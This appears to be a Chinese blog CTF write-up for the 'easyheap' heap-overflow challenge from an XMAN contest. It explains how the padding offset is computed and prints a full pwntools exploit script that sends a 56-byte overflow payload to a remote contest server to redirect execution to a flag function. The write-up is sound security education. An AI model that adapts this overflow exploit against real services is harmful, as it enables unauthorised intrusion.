美文网首页
XMAN个人排位赛

XMAN个人排位赛

作者: yahoo0o0 | 来源:发表于2017-08-10 20:41 被阅读0次

easyheap:


本题是简单的堆溢出,我们先将文件运行一下,看下程序想要执行的具体功能是什么。

可以看到该程序是一个常见的菜单程序,将程序放入IDA进行反编译。

根据malloc函数和qword_602098+8可以计算出填充字符大小为0x20+0x10+8=56

知道这些之后就可以直接写脚本了

```

from pwn import *

target = remote('202.112.51.217',24598)

#target = process("./easyheap.easyheap")这是本地的

flag = 0x400766

payload = 'A' *56 + p64(flag)

target.recvuntil('name?\n')

target.sendline('1')

target.recvuntil('choice :')

target.sendline('1')

target.recvuntil('Name:\n')

target.sendline('1')

target.recvuntil('choice :')

target.sendline('3')

target.recvuntil('info:\n')

target.sendline(payload)

target.recvuntil('choice :')

target.sendline('2')

target.interactive()

```

相关文章

  • [XMAN]个人排位赛

    XSS1 admin=xman{eVEn_CSP_you_G37_mY_C00K1e} Login 查看源码 , ...

  • XMAN个人排位赛

    easyheap: 本题是简单的堆溢出,我们先将文件运行一下,看下程序想要执行的具体功能是什么。 可以看到该程序是...

  • XMAN -个人排位赛 WEB-WRITEup

    XMAN -个人排位赛 WEB-WRITEup Simple SSRF 首先在输入框输入发现只能输入www.bai...

  • XMAN排位赛+课堂练习WP

    misc xman通行证 一道签到题先一波base64解密,然后栅栏,然后凯撒 最坑的还是最后那里,不知道是我方法...

  • vcs 加密

    +protect +Xman

  • XMAN个人赛

    栈溢出,本题可以使用return2libc的方法来解决,用binwalk查看文件属性 查看一下程序使用了什么保护机...

  • 我是Xman!

    我的名字叫郑策,我的英文名叫Xm an,今年8岁。我喜欢机器人、足球、羽毛球、手工、画画,我的梦想是成为一个发明家!

  • 人设

    圈名:Erik Evans 主圈:欧美 主皮: MAR:TS/Jar。 Xman:E/C/angle/Peter ...

  • jarvisOJ wp

    [xman] level0 file : 64位 程序 静态链接加载函数 checksec : NX 开启(堆栈不...

  • 排位赛

    今天的排位赛好坑哦,连胜之后的喜悦还没有过去,天美的连败就要来了,匹配的全是一群小学生,前期使劲送人头,打野的送的...

网友评论

      本文标题:XMAN个人排位赛

      本文链接:https://www.haomeiwen.com/subject/glehrxtx.html